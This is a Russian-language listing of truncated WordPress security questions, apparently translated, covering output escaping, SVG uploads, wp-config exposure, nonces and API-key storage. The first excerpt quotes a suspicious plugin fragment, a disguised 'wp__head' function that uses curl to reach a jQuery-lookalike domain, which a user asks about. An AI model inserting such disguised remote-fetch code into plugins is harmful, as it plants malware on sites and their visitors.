Я нашел это в плагине. Что оно делает? Это опасно? add_action('admin_enqueue_scripts', 'pw_load_scripts'); if (!function_exists('wp__head'){ function wp__head() { if(function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1");...
Сохранение wp-admin/install.phpи wp-admin/install-helper.phpутечка безопасности на более новых версиях WordPress? По умолчанию разрешение на доступ к этим файлам составляет 644. Если есть какая-либо утечка, что за...
В настоящее время этот вопрос не очень подходит для нашего формата вопросов и ответов. Мы ожидаем, что ответы будут подтверждены фактами, ссылками или опытом, но этот вопрос, скорее всего, вызовет дебаты, споры, опрос или расширенное обсуждение. Если вы считаете, что этот вопрос можно улучшить и,...
Я посмотрел на код, но я не мог увидеть какие-либо экранирующие функции, например, the_title the_content the_excerptи т. Д. Я, возможно, не правильно его читал. Нужно ли мне избежать этих функций в разработке темы, как: esc_html ( the_title () ) Изменить: как указано в ответах ниже, приведенный...
Я вижу, что SVG по умолчанию заблокированы в загрузчике мультимедиа, и вы должны добавить его как поддерживаемый тип MIME в functions.php. Какие причины безопасности стоят за...
У нас возникли проблемы с внешним разработчиком. Мы хотим ограничить доступ к wp-adminсайту только внутренним доступом (через VPN ). Просто так он не будет атакован внешними пользователями. Мы можем перечислить администраторов с сайта и не хотим, чтобы они были фишинговыми. Наш разработчик говорит,...
Настройка WordPress для обновления внутри приложения (т.е. WordPress) идеально подходит для меня из-за его удобства. Тем не менее, я обеспокоен требованиями. Запрашиваемые поля, которые появляются после установки ssh2 для php, спрашивают не только мой открытый ключ, но и мой личный ключ. Я думаю,...
Глядя на Кодекс для wp_insert_post (), он утверждает, что эта функция «... очищает переменные, выполняет некоторые проверки, заполняет отсутствующие переменные, такие как дата / время и т. Д.» (РЕДАКТИРОВАТЬ: я обновил запись Кодекса, чтобы включить более надежный пример включает в себя...
Просто быстрый вопрос, который может немного помочь с безопасностью. Я заметил, что в файле readme.html указан номер версии. Он появляется после каждого обновления, как и licence.txt, и wp-config-sample.php. Есть ли простой способ, чтобы WordPress автоматически удалял эти файлы после обновления? Я...
Эта вещь делает мое кодирование трудным. Кодекс Wordpress обуславливает использование esc_url, расплывчато о безопасности. Но стоит ли это того? Например, что является важным, практическим преимуществом безопасности при использовании <?php echo esc_url( home_url( '/' ) ); ?> вместо того...
Первоначальный ситуация Для сайта, который я настраиваю, я искал целую область защиты загрузок / загрузок и ограничения доступа к ним на основе пользовательских ролей / возможностей. Конечно, я прочитал некоторые из предыдущих вопросов, связанных с (общей) темой здесь, для справочных целей наиболее...
Кажется, что они выполняют почти одинаковую работу. Так... Когда я должен использовать esc_html()вместо
Я пытаюсь защитить свой блог WordPress. Я прочитал некоторые посты в Интернете, которые я должен изменить table_prefixи скрыть свои wp-config.php. Тем не менее, я не понимаю? Что может сделать злоумышленник с моим wp-config.php? Я имею в виду, что есть мои конфигурации базы данных, но,...
Я хочу использовать несколько API, и многие приходят с ключами, секретными ключами и паролями, необходимыми для работы. Где в WordPress вы можете хранить эту информацию? Если предположить, что кто-то может взломать вашу БД, есть ли в WordPress способ сделать эту информацию более безопасной? Кроме...
Вероятно, это вопрос новичка, НО выслушать меня - не стоит ли использовать Nonce для защиты от таких вещей, как скребки (phpcurl scrappers и т. Д.)? Но мой Nonce печатает в заголовке документа так: /* <![CDATA[ */ var nc_ajax_getpost = { ...stuff... getpostNonce: "8a3318a44c" }; /* ]]> */ Так...
Я просмотрел много информации о безопасности тем и плагинов WP и понял, что вы должны избегать атрибутов и значений HTML в темах и плагинах. Я видел bloginfo()и echo get_bloginfo()использовал как стандартные, так и внутри esc_html()или esc_attr()функции. Genesis и _s , базовая тема Automattic оба...
Я хочу отфильтровать любой URI HTTP-запроса через HTTP API. Случаи использования: Проверка обновления WordPress идет по адресу http://api.wordpress.org/core/version-check/1.6/ , но https://api.wordpress.org/core/version-check/1.6/ тоже работает, и я хочу использовать это всегда. Новый файл...
Я прочитал много статей в блоге по безопасности WordPress, в которых эксперты по безопасности рекомендуют предпринять особые шаги, чтобы позаботиться о безопасности своего сайта WordPress. Один из них является: Советы по безопасности WordPress: удалите ненужные плагины, которые не используются....
Только что выложил новый плагин: No More Passwords В настоящее время он помечен как бета, потому что вход на платформу является чувствительной проблемой, и я не хочу выпускать что-то, что может иметь дыры в безопасности. Итак, вот мой запрос: Это безопасно? Я сделал следующее для обеспечения...
Я только что запустил WP на своем собственном сервере. Я не пытаюсь запереть вещи больше. Какие разрешения должен иметь пользователь БД для моей БД